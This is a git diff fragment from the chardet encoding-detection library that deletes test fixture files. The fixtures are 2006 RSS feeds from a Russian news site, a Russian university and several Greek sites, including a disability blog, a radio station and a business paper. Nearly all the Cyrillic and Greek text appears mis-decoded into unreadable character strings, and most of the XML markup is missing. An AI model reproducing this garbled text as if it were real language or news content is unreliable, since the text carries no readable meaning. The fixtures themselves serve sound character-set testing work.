¿׀א״ײ׀, ׀ 21 ןׁאן ׀א׀ױג אװ״ ױ׃ װױבגׂ״ױ ׀ גא״ ױבןז׀. - ² ״אױ - Tue, 3 Jan 2006 17:09:00 +0300 - - - - - ² ¸א׀ױ ²²ֱ ֱָ° ׁבגאױן״ ײ״ װ: ׃״ׁ׀ בױלן ״׳ 14 חױׂױ - http://www.newsru.com/world/03jan2006/iraq.html - ¿ בׂ׀ אױװבג׀ׂ״גױן ״א׀ב״ו א׀ׂוא׀״גױלכו א׃׀ׂ, ׁבגאױד ב ׂ׳װדו׀ װׂױא׃בן ײ״ װ ׂ ׃אװױ ±׀װײ״ ׀ בױׂױאױ ¸א׀׀. ֱױלן ״׳ 14 חױׂױ, ׀וװ״ׂט׀ןבן ׂ װױ, ׃״ׁ׀. ² אױ׳דלג׀גױ ׁבגאױ׀ ױיױ גא״ חױׂױ׀ בגא׀װ׀״, ױבל״ װ׀ ׀ױבױ דיױאׁ. - ² ״אױ - Tue, 3 Jan 2006 16:38:00 +0300 - - - - - ² ¼״בױ װ׳אױ״מ ׂ ה׀לט״ׂױג״חױבגׂױ ׳׀װױאײ׀ בכ דׁ״ג ײדא׀״בג״ ַױא׀בׂ - http://www.newsru.com/crime/03jan2006/minsk.html - ² גטױ״״ בכ׀ דׁ״ג ׂ זױ 2004 ׃װ׀ ײדא׀״בג״ ²ױא״״ ַױא׀בׂ °ג׀ ִ״״ׂ׀ ״ ױיױ ױבל״ו ױ׃ ׳׀כו ׂ׳ׁדײװױ ד׃ׂױ װױ בג. 221 "¸׳׃גׂױ״ױ, וא׀ױ״ױ ״ׁ בׁכג ה׀לט״ׂכו װױױ׃ ״״ זױכו ׁד׀׃". - ÷א״״׀ - Tue, 3 Jan 2006 15:39:00 +0300 - - - - - ½ױהגןכױ זױכ ׂכאב״ ״׳-׳׀ ׃׀׳ׂ׃ ה״ג׀ - http://www.newsru.com/finance/03jan2006/oil.html - ֶױכ ׀ ױהגל ׀ בׂכו ״אׂכו ׁ״אײ׀ו ׂכאב״ ״׳-׳׀ ׳׀ׁחױבג״ גאױװױאׂ אבב״ב-דא׀״ב״ ׃׀׳ׂכ ה״ג. ½׀ ½למ-¹אב NYMEX ׁ׀אאױל װאײ׀ ׀ 2,16 װ׀א׀ - װ 63,2 װ׀א׀ ׳׀ ׁ׀אאױל. - ֽ״׀ - Tue, 3 Jan 2006 15:28:00 +0300 - - - - - - - ² ַױןׁ״בױ ױבגכ ײ״גױל גאױׁדױג ג בדװ׀ א׀׳ׁא׀גלבן, ג ׃ א״׳טױ: ג °װ׀כ ״ µׂכ ״״ ג ׁױ׳לןכ - http://www.newsru.com/russia/03jan2006/sered.html - ¶״גױל ַױןׁ״ב׀ ²׀ב״״ ֱױאױװ״, ׂכבגד׀מי״ גׂױגח״ ׂ װ ״׳ בדװױׁכו אזױבבׂ, וװ׀ג׀בגׂׂ׀ ׁ גׂװױ בדװל״, ג״ׂ״אדן םג גױ, חג ׁ׀ ״ א״׳ט״ ג °װ׀׀ ״ µׂכ, ג ױבגל ןׂןמגבן אװבגׂױ״׀״. ¾ בח״ג׀ױג, חג בדװ װײױ אןב״גל םגג ׂאב. - ² ְבב״״ - Tue, 3 Jan 2006 15:15:00 +0300 - - - - - ³אד׳״ ב ײ ׀ג׀ׂ׀ 20-ױגאׂדמ ׀װדׂדמ בׁ׀ד ׀ ׃׀ׂ י׀װ״ ·ד׃װ״װ״ (ִ¾ֲ¾) - http://www.newsru.com/world/03jan2006/knifer.html - ֲױדא ÷ׁ׀״ן ױבל א׀׳ אגד בׁ׀ד ײ, בױ חױ׃ ׁכ ׳׀װױאײ׀ ״ז״ױ. ¾ ױ ב׃ װ׀גל ׂןג׃ ׁךןבױ״ן בׂױד בגדד. µד ׃א׳״ג גא״ ׃װ׀ גמאלכ. - ² ״אױ - Tue, 3 Jan 2006 14:52:00 +0300 - - - - - - - - - ² ÷׀״אױ ׁאדט״״בל ױבל ײ״כו װׂ: ׃״ׁ״ 3 חױׂױ׀, 4 דח״״ א׀ױ״ן - http://www.newsru.com/world/03jan2006/cairo.html - ¸׳-׳׀ ׁאדטױ״ן טױבג״- ״ גאױוםג׀ײ׃ ײ״כו װׂ ׂ בג״זױ µ׃״ג׀ ׳׀ׂ׀׀״ ׀׳׀בן ױאױאכג װךױ׳װ װן גױו״״. ¿א״ח״ ׁאדטױ״ן װׂ בג׀ ג, חג ױבגכױ ײ״גױ״ בגאןג ״ו ״׳ ב׀װױל׃ ״א״ח׀, ״׳׃גׂױ׃ ״׳ אױבבׂ׀׃ דבא׀. - ² ״אױ - Tue, 3 Jan 2006 14:37:00 +0300 - - - - - ְבב״ןױ ׀׳ׂ׀״ ב׀כױ ״גױאױבכױ ה״לכ, ״׃״, ײדא׀כ ״ גױױױאױװ׀ח״ ׂ 2005 ׃װד - http://www.newsru.com/cinema/03jan2006/best.html - ֳח׀בג״״ אב׀, אׂױװױ׃ °׀״ג״חױב״ זױגא ־א״ן »ױׂ׀װכ, כג׀״בל ׀׳ׂ׀גל ב׀כ ״גױאױבכ ה״ל, ״׃ד, גױױא׃א׀ד ״ ײדא׀. ¿א״ױח׀גױל, חג בׂ גׂױג ׀ ׂבױ 4 ׂאב׀ - "׳׀גאדװןמבל גׂױג״גל". - ÷דלגדא׀ - Tue, 3 Jan 2006 14:22:00 +0300 - - - - - - - ² ׂ ׃װד ׀ ¼÷ֱ ׃דג גױ״גל "בדו ׳׀" - http://www.newsru.com/russia/03jan2006/mks.html - -ֳײױ ןגל ױג ב ױג׀, ׃װ׀ ¼÷ֱ בג׀׀ ׁ״ג׀ױ, ׀ ױ װױבגׂדױג ײױבגח׀ט״ ׳׀אױג ׀ ׀׃ל. ¿ בדו׀, ױאׂכ ב׀ׁױ״ױ בג׀׀ װבג׀ׂ׀ ׀ ׁאג ט׀װכו הױג ב ״ױא. ½ װ׀ײױ םג ה״ז״׀ל װגׂױאװ״גל ױׂ׳ײ, ׂױװל ׀אדט״גױן ׃א׳״ג ױױװױױ דׂלױ״ױ. - ² ְבב״״ - Tue, 3 Jan 2006 13:48:00 +0300 - - - - - - - Maariv: ֳב׀׀ ׁױ »׀װױ דײױ 3 ׃װ׀ ײ״ׂױג ׂ ¸׳א׀״ױ - http://www.newsru.com/world/03jan2006/laden.html - -³א׀ײװ׀״ °ה׃׀״בג׀׀ ֳב׀׀ ׁױ »׀װױ ׂךױו׀ ׂ ¸׳א׀״ל גדא״בג״חױב ׂ״׳ױ חױאױ׳ ׃װ ״ גא״ װן בױ גױא׀גׂ 11 בױגןׁאן 2001 ׃װ׀ ׂ ֱָ°, ױאױװ ׀ױא״׀ב״ ׂגאײױ״ױ ׂ ¸א׀. µ׃ ׂכױ׳װ ״׳ ¸׳א׀״ן ױ ׁכ ׳׀ה״ב״אׂ׀. - ² ״אױ - Tue, 3 Jan 2006 13:32:00 +0300 - - - - - ְבב״ןױ ׀׳ׂ׀״ ב׀כו דכו, בױכו ״ בױבד׀לכו ״ג״ׂ בגא׀כ - http://www.newsru.com/russia/03jan2006/politics.html - °׀״ג״חױב״ זױגא ־א״ן »ױׂ׀װכ אׂױ אב באױװ״ אבב״ן ׂ זױ 2005 ׃װ׀. ְױבװױגכ גׂױג״״ ׀ ׂאבכ ב׀כו חױבגכו, בױכו, דכו ״ בױבד׀לכו ״ג״׀ו. ¸״ בג׀״ ¿דג״ ״ ¶״א״ׂב״. ÷אױ ג׃, אבב״ןױ ׀׳ׂ׀״ ְ׀׀ °ׁא׀ׂ״ח׀ ב׀כ ׁ׃׀גכ חױׂױ בגא׀כ. - ² ְבב״״ - Tue, 3 Jan 2006 13:05:00 +0300 - - - - - - - - ² Windows ׀װױ׀ ׀ב׀ן דן׳ׂ״בגל, ד׃אײ׀מי׀ן חג״ ׂבױ למגױא׀ ׀ ׀ױגױ - http://www.newsru.com/world/03jan2006/windows.html - »מׁ ״׳ ״״ׂ למגױאׂ װ דא׀ׂױ״ױ ¾ֱ Windows ײױג ׁכגל ׀ג׀ׂ׀ אן בױח׀ב, ״טױג ׃׀׳ױג׀ Financial Times. °ג׀׀ א״בוװ״ג דגױ ׂױבױ״ן ׂאױװב׃ װ׀ ׂ ׁכחדמ ׀אג״ד. ֽג ׃א׀ג דׂױ״ח״ׂ׀ױג ׀בבגל ׳׀א׀ײױ״ן. ÷אױ ג׃, Microsoft ׀ ױ ׂכדבג״׀ ״בא׀ׂױ״ױ, ׳׀אכׂ׀מיױױ "װכאד". - ² ״אױ - Tue, 3 Jan 2006 12:25:00 +0300 - - - - - - - Die Presse: ¿דג״ - ׂ׀בגױ״ ׃דׁ׃ ׃ן - http://www.newsru.com/russia/03jan2006/putingas.html - "³׀׳א" &#8211; םג ׃׀ׂױ אדײ״ױ ¿דג״׀ ׂ ׁאלׁױ ׳׀ ׂ״ן״ױ ״ ׂ׀בגל. ֱ גױו א ׀ "³׀׳א" א״בג׀ׂ״ ב׀ׁײױ״ױ ֳא׀״כ א״אװכ ׃׀׳, ײ״׳ל ׂ זױגא׀ל װ״בױגחױאב ״״, ױבגאן ׀ ׂ׃װ״ױ א׀׳װ״״, ׁלױג מח. - ² ְבב״״ - Tue, 3 Jan 2006 12:13:00 +0300 - - - - - - - ¸׳ דג׀ ׁױ׀ ׂ׀מגכ ׂ ¼בׂױ ו״יױ 35 גכבןח װ׀אׂ - http://www.newsru.com/crime/03jan2006/grab.html - ´ׂױ ױ״׳ׂױבגכו ׂױחױא ׂ ױװױל״ בׂױאט״״ א׀׳ׁױ ׀׀װױ״ױ ׀ דג ׁױ׀ ׂ׀מגכ ׀ ±אׂב טבבױ. ÷׀בב״א׀ דװ׀א״״ ׃ׂױ ״ בׂן׳׀״. - ÷א״״׀ - Tue, 3 Jan 2006 12:03:00 +0300 - - - - - ² ֱָ° ג ב׀ב ײ״׳ל ו׳ן״ד, ׳ׂ״ׂ גױױהד ׂ בדײׁד 911 - http://www.newsru.com/world/03jan2006/cat.html - 50 ױג״ ³׀אא״ ְטױ׳ ד׀ ב ״ׂ׀״װ׃ אױב׀ ״ ױ ׃ װןגלבן ״׳-׳׀ בדח״ׂטױ׃בן ״א״בדלג׀. ֵ׳ן״ ײ״ׂג׃ א״׳׀בן, חג בױז״׀ל כג׀בן ׁדח״גל ג׀ ׀ײ״׀גל ׀ גױױהױ ד אן׃ ׳ׂ׀ ׂ בדײׁד 911, ״׀ ױ א׀בבח״גכׂ׀, חג ג װױבגׂ״גױל בײױג םג בװױ׀גל. - ² ״אױ - Tue, 3 Jan 2006 11:42:00 +0300 - - - - - - - - - ½ױױז׀ן ׀א׀ ׳׀דאׂ׀׀ ׂ ׁױג װׂדו װױגױ - http://www.newsru.com/crime/03jan2006/germanz.html - ֱ א״׳׀״ױ ׂ א׀ׂוא׀״גױלכױ א׃׀כ ןׂ״בן דײח״׀. ¾ בׁי״, חג ׂ בױאױװ״ױ 1990-ו ׃װׂ ׳׀וא״ װׂדו װױגױ ׂ װׂ׀ױ װ׀. ֲױ׀ װױגױ ׁכ״ באןג׀כ ׂ דבאכ ׀ױג ״ ׳׀דאׂ׀כ. - ÷א״״׀ - Tue, 3 Jan 2006 11:24:00 +0300 - - - - - ¼¸´ ׁׂ״ןױג ֲׁ״״ב״ ׂ א׀באדח״ׂ׀״״ ׀ג״אבב״ב ׀׀״״ - http://www.newsru.com/russia/03jan2006/gruz.html - ֲׁ״״ב״ א׀באדח״ׂ׀ױג ׀ג״אבב״בדמ ׀׀״מ. ³ׂא״גל בא׀ו װ״ב׀״ן אבב״ב-׃אד׳״ב׃ ´׃ׂא׀ װאדײׁױ ײ גל בױ א׀״׳׀ז״״ ׀גבהױאכ ׂ װׂדבגא״ו גטױ״ןו, ׀בג׀״ׂ׀ױג ¼¸´. - ² ְבב״״ - Tue, 3 Jan 2006 11:04:00 +0300 - - - - - - - ְ׀בגױג ח״ב ׃״ׁט״ו ׂ אױ׳דלג׀גױ ׁׂ׀׀ אכט״ ׀ג׀ ׂ ±׀ׂ׀א״״ - http://www.newsru.com/world/03jan2006/de.html - ¿ ױאױ אװײױ״ן ב׀ב׀גױלכו א׀ׁג ׀ ױבגױ ׁאדטױ״ן אכט״ באגױב׀ ׂ ױבגױחױ ±׀װ ְ׀וױו׀ל ב׀ב׀גױ״ ״׳ׂױ׀מג ״׳-װ ׳׀ׂ׀ׂ ׂבױ ׂכױ גױ׀. ¿ בױװ״ װ׀כ, ח״ב ׃״ׁט״ו װבג״׃ 15 חױׂױ. ±ױױ 30 חױׂױ דח״״ א׀ױ״ן. ַױגׂױא בח״ג׀מגבן א׀ׂט״״ ׁױ׳ ׂױבג״. - ² ״אױ - Tue, 3 Jan 2006 10:52:00 +0300 - - - - - - - - - - - - - - - - - - - - ´ׂױ ׂױבדײ׀י״ו ׃״ׁ״ ׀ ÷¿¿ ׂ ַױחױ - http://www.newsru.com/russia/03jan2006/chechen.html - ¿װׂױא׃בן ׁבגאױד ÷¿¿ ׀ א׀״ױ א׀זױגא׀ ÷דאח׀. ½ױ״׳ׂױבגכױ ״ז׀ ״׳ ׀ׂג׀ג״חױב׃ אדײ״ן ׁבגאױן״ ׀אןװ ׂױבדײ׀י״ו ²דגאױ״ו ׂב, בדיױבגׂןׂט״ װבגא ׀ׂגגא׀באג׀. - ² ְבב״״ - Tue, 3 Jan 2006 10:34:00 +0300 - - - - - ²׳אכׂ ׀ ט׀וגױ ׂ ֱָ°: 13 ׃אןׂ א׀״ ׁױ׳ ׂױבג״ - http://www.newsru.com/world/03jan2006/mine.html - ²׳אכׂ א״׳טױ ׀ ד׃ל ט׀וגױ ׂ ·׀׀װ ²״אװײ״״״. ֱ׀ב׀גױן ׀ ױ דװ׀ױגבן דבג׀ׂ״גל ג׀ג ב ׃אן׀״, גאכױ אױװײ״גױל ׁ״אׂ׀כ ׀ ׃דׁ״ױ ׂ 80 ױגאׂ. - ² ״אױ - Tue, 3 Jan 2006 10:21:00 +0300 - - - - - - - - "³׀׳א": ֳא׀״׀ אװײ׀ױג ׂאׂ׀גל, בג׀ׂ׀ םג ױ ױט׀ױג - http://www.newsru.com/finance/03jan2006/gas.html - ¿אױ׳״װױג ֳא׀״כ ־יױ דגׂױאײװ׀ױג, חג ׃׀׳גא׀באג׀ן ב״בגױ׀ בגא׀כ ׁױבױח״ׂ׀ױג גא׀׳״ג. "³׀׳א" ׁױי׀ױג ױׂאױב״ גאױׁ״גױן ױב׀ז״״, דגׂױאײװ׀ן, חג ֳא׀״׀ אװײ׀ױג ױב׀ז״״אׂ׀ גׁ״א׀גל אבב״ב״ ׃׀׳. - ֽ״׀ - Tue, 3 Jan 2006 10:11:00 +0300 - - - - - - - - - ֱױזױא׀ז״ן ׂ ´׀׃ױבג׀ױ: דׁ״גכ 5 ׁױׂ״ׂ ״ 2 ״״ז״ױא׀ - http://www.newsru.com/russia/03jan2006/oper.html - ² וװױ ׀בטג׀ׁ בױזױא׀ז״״ ׁ״אׂ׀״מ ׃אדכ ׁױׂ״ׂ ׂ ֳזדדלב א׀ױ ´׀׃ױבג׀׀ א׀ױ״ן דח״״ 7 בגאדװ״ׂ א׀ׂוא׀״גױלכו א׃׀ׂ, װׂױ ״׳ ״ו בח׀״בל. ¿גױא״ ׁױׂ״ׂ זױ״ׂ׀מגבן ׂ ןגל דׁ״גכו. °ג״ׂ׀ן ה׀׳׀ בױזױא׀ז״״ ב ׀בגדױ״ױ גױגכ א״בג׀ׂױ׀. - ² ְבב״״ - Tue, 3 Jan 2006 09:48:00 +0300 - - - - - - - - ÷ 2050 ׃װד ׂ ״אױ ןׂןגבן ׂכױ בׂױאוװױאײ׀ׂכ. ְבב״ן אװײ״ג בגױױ ׂכ״א׀גל - http://www.newsru.com/world/03jan2006/future.html - ÷״ג׀ 2050 ׃װד בג׀ױג ב׀ י ם״חױב װױאײ׀ׂ ׀ױגכ, ¸װ״ן - ״אׂכ ״װױא ח״בױבג״ ׀בױױ״ן, ג׃װ׀ ׀ ְבב״ן ב דױלט״ׂט״בן ׀בױױ״ױ ׂװױג ׂ װױבןגד י״ ם״״. - ² ״אױ - Tue, 3 Jan 2006 09:42:00 +0300 - - - - - - - ½׀ׂװױ״ױ ׂ ¸װױ׳״״: ח״ב ׃״ׁט״ו אױׂכב״ 50 חױׂױ - http://www.newsru.com/world/03jan2006/flood.html - ¸׳-׳׀ אװײ׀ׂט״ובן װׂ׀ װן װאןװ װײװױ ׂ א׀ױ ¿׀ג״ א״׳טױ ׃״׃׀גב״ ׳ױל ״ ׂכט׀ ״׳ ׁױאױ׃ׂ אױ׀, ׂ אױ׳דלג׀גױ חױ׃ יכױ ג״ ׂװכ ״ ׃אן׳״ ׁאדט״״בל ׀ ױבל ׁ״׳ױײ׀י״ו װױאױׂױל. - ² ״אױ - Tue, 3 Jan 2006 09:26:00 +0300 - - - - - - - - ² ¼בׂױ ׂ ׂגא״ ׁדװױג א׳ - http://www.newsru.com/russia/03jan2006/pogoda.html - ² בג״זױ בגׁ״ גױאױגא׀ ױ דבג״גבן ״ײױ גױג״ 1-3 ׃א׀װדב׀ א׳׀, ׀ ׁ׀בג״ - 1-6 ׃א׀װדבׂ. ²ױגױא ׁדװױג מ׃-ׂבגחכ, דױאױכ ״ ױ אױׂכב״ג 3-8 ױגאׂ ׂ בױדװד. - ² ְבב״״ - Tue, 3 Jan 2006 09:15:00 +0300 - - - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/susu.ac.ru.xml b/chardet/tests/iso-8859-5-cyrillic/susu.ac.ru.xml deleted file mode 100644 index 0927a0c..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/susu.ac.ru.xml +++ /dev/null @@ -1,24 +0,0 @@ - - - - -ru -press@susu.ac.ru (ֶױגא ״הא׀ז״״ ״ בׂן׳ױ ב ׁיױבגׂױבגלמ) -webmaster@urc.ac.ru (¾גװױ ׃ׁ׀לכו בױגױׂכו גױו׃״) -http://susu.ac.ru/gerb2.gif -־ײ-ֳא׀לב״ ׃בדװ׀אבגׂױכ ד״ׂױאב״גױג -http://susu.ac.ru/ -½ׂבג״ ־ֳא³ֳ -http://susu.ac.ru/ru/news/ -½ׂבג״ ־ײ-ֳא׀לב׃ ׃בדװ׀אבגׂױ׃ ד״ׂױאב״גױג׀ (ַױןׁ״ב) -~220 V, 50 Hz -1995-2004 ־ײ-ֳא׀לב״ ׃בדװ׀אבגׂױכ ד״ׂױאב״גױג -Thu, 10 Mar 2005 15:45:45 +0500 - -Thu, 29 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1329 -½׀׃א׀ײװױכ ׁױװ״גױ״ דאב׀ ב׀גׂ -29 װױ׀ׁאן ׂ ׳׀ױ ׳׀בױװ׀״ ֳחס׃ בׂױג׀ ־ײ-ֳא׀לב׃ ׃בדװ׀אבגׂױ׃ בׂױג׀ בבגן׀בל זױאױ״ן ׀׃א׀ײװױ״ן ׁױװ״גױױ דאב׀ ב׀גׂ \ No newline at end of file diff --git a/chardet/tests/iso-8859-7-greek/disabled.gr.xml b/chardet/tests/iso-8859-7-greek/disabled.gr.xml deleted file mode 100644 index e2881eb..0000000 --- a/chardet/tests/iso-8859-7-greek/disabled.gr.xml +++ /dev/null @@ -1,181 +0,0 @@ - - - - - - - Disabled.GR - http://www.disabled.gr/at - Make Love not Rehab... - Mon, 19 Dec 2005 12:04:11 +0000 - http://wordpress.org/?v=1.5.1.3 - en - - - ֶחפופבי גןחטע םןףןךלב - http://www.disabled.gr/at/?p=1796 - http://www.disabled.gr/at/?p=1796#comments - Fri, 28 Oct 2005 07:01:24 +0000 - Nikos - - ׀וסיןהיך "ֱםבנחסב װֱׁ" - ֱסףוי שע ִדלב !!! - Disabled.GR - ּיךסע ֱדדוכוע - http://www.disabled.gr/at/?p=1796 - - http://www.disabled.gr/at/?feed=rss2&p=1796 - - - װ וםבי פן ֱֱֽ׀ֱַֹׁ װֱׁ; ִיבגףפו !!! - http://www.disabled.gr/at/?p=796 - http://www.disabled.gr/at/?p=796#comments - Mon, 25 Apr 2005 17:14:59 +0000 - Nikos - - ׀וסיןהיך "ֱםבנחסב װֱׁ" - ֱםבךןים‏ףויע - ֱסףוי שע ִדלב !!! - Disabled.GR - http://www.disabled.gr/at/?p=796 - - http://www.disabled.gr/at/?feed=rss2&p=796 - - - ׀‏ע םב החלןףיו‎ףופו ליךס בדדוכב ףפן www.DISABLED.GR - http://www.disabled.gr/at/?p=1749 - http://www.disabled.gr/at/?p=1749#comments - Thu, 31 Mar 2005 07:44:16 +0000 - Nikos - - ֱסףוי שע ִדלב !!! - ּיךסע ֱדדוכוע - http://www.disabled.gr/at/?p=1749 - - http://www.disabled.gr/at/?feed=rss2&p=1749 - - - ַ החלןפיךפחפב פןץ WWW.DISABLED.GR - http://www.disabled.gr/at/?p=1728 - http://www.disabled.gr/at/?p=1728#comments - Tue, 29 Mar 2005 09:28:29 +0000 - Nikos - - ׀וסיןהיך "ֱםבנחסב װֱׁ" - ִיבהךפץן - ֱסףוי שע ִדלב !!! - Disabled.GR - http://www.disabled.gr/at/?p=1728 - - http://www.disabled.gr/at/?feed=rss2&p=1728 - - - ׀וסיןהיך ֱםבנחסב װֱׁ (׀םבךבע ׀וסיוקןלםשם) - http://www.disabled.gr/at/?p=956 - http://www.disabled.gr/at/?p=956#comments - Fri, 18 Mar 2005 19:10:42 +0000 - Nikos - - ֱםץנפבךפב - ֵלוע :-) - ׀וסיןהיך "ֱםבנחסב װֱׁ" - ֱסףוי שע ִדלב !!! - Disabled.GR - http://www.disabled.gr/at/?p=956 - - http://www.disabled.gr/at/?feed=rss2&p=956 - - - ׀‏ע טב החלןףיו‎ףופו ךולוםב ףפן www.DISABLED.GR ךבי ףפן נוסיןהיך ֱֱֽ׀ֱַֹׁ װֱׁ - http://www.disabled.gr/at/?p=1190 - http://www.disabled.gr/at/?p=1190#comments - Fri, 18 Mar 2005 17:19:22 +0000 - Nikos - - ׀וסיןהיך "ֱםבנחסב װֱׁ" - ֱםבךןים‏ףויע - ׀בסכץףח - ֱסףוי שע ִדלב !!! - Disabled.GR - http://www.disabled.gr/at/?p=1190 - - http://www.disabled.gr/at/?feed=rss2&p=1190 - - - ֱֱֳֳֵֹֻ - http://www.disabled.gr/at/?p=2556 - http://www.disabled.gr/at/?p=2556#comments - Mon, 19 Dec 2005 12:04:11 +0000 - Georgia Fika - - ּיךסע ֱדדוכוע - http://www.disabled.gr/at/?p=2556 - - http://www.disabled.gr/at/?feed=rss2&p=2556 - - - ֱֱֳֳֵֹֻ - http://www.disabled.gr/at/?p=2555 - http://www.disabled.gr/at/?p=2555#comments - Fri, 16 Dec 2005 10:11:12 +0000 - Georgia Fika - - ּיךסע ֱדדוכוע - http://www.disabled.gr/at/?p=2555 - - http://www.disabled.gr/at/?feed=rss2&p=2555 - - - ִוכפב ךןיםשםיךן‎ פןץסיףלן‎ 29 וךבפ. וץס‏ - http://www.disabled.gr/at/?p=2554 - http://www.disabled.gr/at/?p=2554#comments - Wed, 14 Dec 2005 09:45:15 +0000 - Nikos - - ׀בסןקע - ִיבךןנע, ֱםברץק - ֱסףוי שע ִדלב !!! - http://www.disabled.gr/at/?p=2554 - - http://www.disabled.gr/at/?feed=rss2&p=2554 - - - ַ קסחלבפןהפחףח פחע ךןיםשםיךע ףץםןקע - http://www.disabled.gr/at/?p=2553 - http://www.disabled.gr/at/?p=2553#comments - Tue, 13 Dec 2005 18:24:46 +0000 - Nikos - - ֵץסשנבתך ¸םשףח - http://www.disabled.gr/at/?p=2553 - - http://www.disabled.gr/at/?feed=rss2&p=2553 - - - diff --git a/chardet/tests/iso-8859-7-greek/hotstation.gr.xml b/chardet/tests/iso-8859-7-greek/hotstation.gr.xml deleted file mode 100644 index cffcb67..0000000 --- a/chardet/tests/iso-8859-7-greek/hotstation.gr.xml +++ /dev/null @@ -1,68 +0,0 @@ - - - - - - - -HotStation.gr - Greek Radio Online -http://www.HotStation.gr -HotStation.gr -el - - -Mescalinaeden + Eventless Plot -http://www.HotStation.gr/modules.php?name=News&file=article&sid=864 - - - -ֿי Helloween ףו ָוףףבכןםךח ךבי ֱטםב - וסהףפו נסןףךכףויע -http://www.HotStation.gr/modules.php?name=News&file=article&sid=863 - - - -ֵםב דסללב בנ פןם Bono (פשם U2) -http://www.HotStation.gr/modules.php?name=News&file=article&sid=862 - - - -Vanessa Mae: ַ גבףכיףףב פןץ גיןכין‎ מבם ףפחם ֵככהב -http://www.HotStation.gr/modules.php?name=News&file=article&sid=861 - - - -Happy Mondays DJ set & Live PA -http://www.HotStation.gr/modules.php?name=News&file=article&sid=860 - - - -A letter from Bono (U2) -http://www.HotStation.gr/modules.php?name=News&file=article&sid=859 - - - -Suave Gap &#8230;have a happy pop/punk new year! -http://www.HotStation.gr/modules.php?name=News&file=article&sid=858 - - - -׳סיףפןץדוםםיפיךן party פחע ֱֵ דיב פן ׳בלדוכן פןץ ׀ביהין‎ -http://www.HotStation.gr/modules.php?name=News&file=article&sid=857 - - - -׀בסןץףבףח: ‏ףפבע ׳סןםנןץכןע -http://www.HotStation.gr/modules.php?name=News&file=article&sid=856 - - - -Christmas Hip Hop Event -http://www.HotStation.gr/modules.php?name=News&file=article&sid=855 - - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.bus.xml b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.bus.xml deleted file mode 100644 index a162991..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.bus.xml +++ /dev/null @@ -1,122 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֵ׀ֹ׳ֵַֹׁ׃ֵֹ׃ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֵ׀ֹ׳ֵַֹׁ׃ֵֹ׃ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:11:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -װסב םב קבסבךפחסיףפיך ףפחם ודק‏סיב בדןס בכץףהשם כיבםיךע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137086 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137086 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -Blue Properties: ּו 5,35% ףפח Veterin -http://www.naftemporiki.gr/news/rssredir.asp?id=1137077 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137077 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֻבתך װסנוזב: ֽן ךבפבטופיך נסןתם ודדץחלםןץ ךוצבכבןץ -http://www.naftemporiki.gr/news/rssredir.asp?id=1137090 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137090 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ּחקבםיך: ׃ץלצשםב לו פחם Praktiker -http://www.naftemporiki.gr/news/rssredir.asp?id=1137079 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137079 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֱכןץלםיןם פחע ֵככהןע: ֵנבםבדןס לופןק‏ם -http://www.naftemporiki.gr/news/rssredir.asp?id=1137076 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137076 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֲֵֵֻ ֵםהץלפשם ֱֵ: ׃ץדק‏םוץףח לו טץדבפסיך -http://www.naftemporiki.gr/news/rssredir.asp?id=1137123 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137123 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׳סחלבפיףפסין ֱטחם‏ם: ִיבדשםיףלע דיב קסףפוע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137108 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137108 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ּכןם פחע Eסיהןע פן ךףפןע פשם ךכףושם נסןע פןץע 118׳׳ -http://www.naftemporiki.gr/news/rssredir.asp?id=1137083 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137083 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ַלוסןכדין פןץ לופקןץ -http://www.naftemporiki.gr/news/rssredir.asp?id=1137112 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137112 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -בכ‎צטחךו ח ב‎מחףח ל/ך פחע ּןץסיהחע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137121 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137121 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - - - - - - diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.cmm.xml 